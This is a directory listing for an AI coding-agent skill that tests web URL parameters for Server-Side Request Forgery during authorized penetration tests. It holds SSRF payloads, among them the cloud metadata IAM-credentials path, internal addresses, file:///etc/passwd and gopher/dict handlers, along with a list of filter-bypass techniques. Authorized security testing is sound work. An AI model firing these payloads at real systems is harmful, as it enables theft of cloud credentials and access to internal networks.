Tests web application URL parameters for Server-Side Request Forgery by probing cloud metadata endpoints (AWS/GCP/Azure at 169.254.169.254), internal network services, and protocol handlers (file://, gopher://, dict://) using a Python script, including IP-encoding bypass and DNS rebinding checks. Use during authorized penetration testing to confirm SSRF in a URL-fetching parameter and generate a vulnerability report.
Scanned 9/2/2026
Install to Claude Code
npx -y skills add nuroctane/nur-cli --skill performing-ssrf-vulnerability-exploitation --agent claude-codeInstalls into .claude/skills of the current project.
Are you the author of Performing Ssrf Vulnerability Exploitation?
Add the live security badge to your README — it updates automatically with every re-scan.
[](https://www.skillsdirectory.com/skills/nuroctane-performing-ssrf-vulnerability-exploitation)More formats (shields.io, HTML) on the badges page.
---
name: performing-ssrf-vulnerability-exploitation
description: >-
Tests web application URL parameters for Server-Side Request Forgery by
probing cloud metadata endpoints (AWS/GCP/Azure at 169.254.169.254),
internal network services, and protocol handlers (file://, gopher://,
dict://) using a Python script, including IP-encoding bypass and DNS
rebinding checks. Use during authorized penetration testing to confirm SSRF
in a URL-fetching parameter and generate a vulnerability report.
domain: cybersecurity
subdomain: security-operations
tags:
- ssrf
- web-application-security
- cloud-metadata-abuse
- vulnerability-exploitation
- penetration-testing
version: '1.0'
author: mahipal
license: Apache-2.0
nist_csf:
- DE.CM-01
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1078
- T1190
- T1059
- T1078.004
- T1530
---
## When to Use
- When conducting security assessments that involve performing ssrf vulnerability exploitation
- When following incident response procedures for related security events
- When performing scheduled security testing or auditing activities
- When validating security controls through hands-on testing
## Prerequisites
- Familiarity with security operations concepts and tools
- Access to a test or lab environment for safe execution
- Python 3.8+ with required dependencies installed
- Appropriate authorization for any testing activities
## Instructions
1. Install dependencies: `pip install requests`
2. Identify URL parameters in the target application that accept URLs or hostnames.
3. Test SSRF payloads:
- Cloud metadata: `http://169.254.169.254/latest/meta-data/`
- Internal services: `http://127.0.0.1:port/`, `http://10.0.0.1/`
- Protocol handlers: `file:///etc/passwd`, `gopher://`, `dict://`
- Bypass techniques: IP encoding, DNS rebinding, URL redirects
4. Analyze responses for information disclosure or internal access confirmation.
5. Generate a vulnerability assessment report.
```bash
# For authorized penetration testing and lab environments only
python scripts/agent.py --target-url https://app.example.com/fetch?url= --output ssrf_report.json
```
## Examples
### AWS Metadata SSRF
```
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
```
If the response contains AWS credentials (AccessKeyId, SecretAccessKey), SSRF is confirmed with critical impact.
Is this your skill, or is something wrong with this listing? Request removal or report an issue. Author removals are honored within 72 hours.
No comments yet. Be the first to comment!